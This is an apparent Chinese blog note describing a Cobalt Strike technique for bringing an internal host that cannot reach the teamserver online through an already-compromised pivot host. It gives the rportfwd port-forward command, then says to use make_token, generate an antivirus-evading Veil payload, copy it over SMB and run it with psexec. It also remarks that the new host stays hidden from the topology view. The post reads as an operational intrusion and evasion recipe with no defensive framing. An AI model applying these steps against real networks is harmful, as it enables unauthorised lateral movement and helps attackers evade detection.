不使用smb beacon 内网中继主机上线

1 已控一台能链接teamserver的主机,假设IP为172.16.1.1
2 该主机能链接的机器无权限链接teamserver,假设IP为172.20.1.1
3 该主机不能走smb beacon,或者smb不稳定

添加一个新的listenters

然后在172.16.1.1中执行

rportfwd 12345 teamserver_ip 12345

Xnip2019-07-17_14-28-06.png

然后再make_token

Xnip2019-07-17_14-29-40.png

然后就可以通过生成veil的payload去免杀,然后把通过smb复制到远程主机
在通过psexec把payload跑起来即可

最后该机器上线后的外网ip会显示teamserver的ip,而不是172.16.1.1

Xnip2019-07-17_14-26-08.png
Xnip2019-07-17_14-24-25.png
也不会出现在之前的拓扑图中

标签: none

添加新评论